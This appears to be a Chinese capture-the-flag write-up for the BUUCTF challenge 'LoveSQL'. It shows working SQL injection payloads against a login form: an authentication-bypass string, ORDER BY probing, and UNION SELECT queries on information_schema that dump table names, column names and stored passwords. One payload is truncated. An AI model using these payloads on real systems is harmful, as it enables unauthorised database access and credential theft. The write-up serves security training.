BUUCTF Web [极客大挑战 2019]LoveSQL

简介: 一、题目简介进入题目连接是一个「登录」界面

一、题目简介

进入题目连接是一个「登录」界面

image.png

登录「成功」会显示当前用户的账号和密码

image.png

登录「失败」则会则会提示错误的用户名和密码

image.png

二、思路分析

       这一关是「SQL注入」漏洞,注入点为单引号字符型注入,推荐使用「联合注入」

看到登录功能,第一反应就是SQL注入,先尝一下「万能账号」,依次尝试各种类型的万能账号。点击链接查看《万能账号密码使用详解》

image.png

单引号字符型的万能账号登录「成功」

image.png

页面有「显示位」,推荐使用联合注入,这一关没有过滤,判断字段数以后直接脱库即可

三、解题步骤

1)判断注入点

使用万能账号判断「注入点」,payload如下

账号输入a' or true -- a

密码随便输入 111

image.png

2)判断字段数

使用 order by 排序判断显示位的「字段数」

账号依次输入

a’ or true order by 1 – a

a’ or true order by 2 – a

a’ or true order by 3 – a

a’ or true order by 4 – a

密码随便输入 111

排序到 4 时报错,说明字段数为 3

image.png

3)获取所有表

CFT有个不成文的「规矩」,SQL注入漏洞中,flag通常会放在当前使用的数据库中。我们直接获取当前数据库的表即可

  • 用户名输入以下payload
a' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3
  • 密码随便输入 111

拿到两个表名 geekuser、l0ve1ysq1,flag在第二个表中

image.png

4)获取字段

获取 l0ve1ysq1 表的所有「字段」

  • 用户名输入以下payload
a' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and
  • 密码随便输入 111

拿到 3 个字段 id,username,password,flag 就在 password 字段中

5)获取flag

查询 l0ve1ysq1 表的 password 字段,获取 「flag」

  • 用户名输入以下payload
a' union select 1,(select group_concat(password) from l0ve1ysq1),3 -- a

密码随便输入 111

拿到 n 个数据

image.png

页面不方便查看,可以右键查看「网页源代码」

image.png

夺旗成功!

四、总结

喜欢一个东西首先要先学会「尊重」,虽然网络安全的圈子不乏各种灰产,以及高调宣传自己是黑客的脚本小子,但不可否认,这个圈子仍有不少人保持着「举世皆浊我独清,众人皆醉我独醒」的心态,努力磨砺技术,提升自身修养,让互联网变得更加安全

相关文章
|
7月前
|
SQL 安全 关系型数据库
BUUCTF:Web 解析(一)
BUUCTF:Web 解析(一)
|
7月前
|
数据库 数据安全/隐私保护
BUUCTF---web---[极客大挑战 2019]HardSQL
BUUCTF---web---[极客大挑战 2019]HardSQL
|
安全 网络安全 PHP
BUUCTF Web [极客大挑战 2019]Knife
BUUCTF Web [极客大挑战 2019]Knife [极客大挑战 2019]Knife 一、题目简介 二、思路分析
489 0
BUUCTF Web [极客大挑战 2019]Knife
|
安全 网络安全 PHP
BUUCTF Web [极客大挑战 2019]Secret File
[极客大挑战 2019]Secret File 一、题目简介 二、思路分析 1)信息泄露
848 0
BUUCTF Web [极客大挑战 2019]Secret File
|
安全 网络安全
BUUCTF Web [ACTF2020 新生赛]Exec
[ACTF2020 新生赛]Exec 一、题目简介 二、思路分析
239 0
BUUCTF Web [ACTF2020 新生赛]Exec
|
安全 前端开发 网络安全
BUUCTF Web [ACTF2020 新生赛]Include
[ACTF2020 新生赛]Include 一、题目简介 二、思路分析
418 0
BUUCTF Web [ACTF2020 新生赛]Include
|
SQL 安全 关系型数据库
BUUCTF Web [强网杯 2019]随便注
[强网杯 2019]随便注 一、题目简介
444 0
BUUCTF Web [强网杯 2019]随便注
|
安全 网络安全
BUUCTF Web [极客大挑战 2019]Havefun
大挑战 2019]Havefun 一、题目简介
407 0
BUUCTF Web [极客大挑战 2019]Havefun
|
SQL 安全 网络安全
BUUCTF Web [极客大挑战 2019]EasySQL
[HCTF 2018]WarmUp 一、题目简介
232 0
|
2月前
|
XML JSON API
ServiceStack:不仅仅是一个高性能Web API和微服务框架,更是一站式解决方案——深入解析其多协议支持及简便开发流程,带您体验前所未有的.NET开发效率革命
【10月更文挑战第9天】ServiceStack 是一个高性能的 Web API 和微服务框架,支持 JSON、XML、CSV 等多种数据格式。它简化了 .NET 应用的开发流程,提供了直观的 RESTful 服务构建方式。ServiceStack 支持高并发请求和复杂业务逻辑,安装简单,通过 NuGet 包管理器即可快速集成。示例代码展示了如何创建一个返回当前日期的简单服务,包括定义请求和响应 DTO、实现服务逻辑、配置路由和宿主。ServiceStack 还支持 WebSocket、SignalR 等实时通信协议,具备自动验证、自动过滤器等丰富功能,适合快速搭建高性能、可扩展的服务端应用。
158 3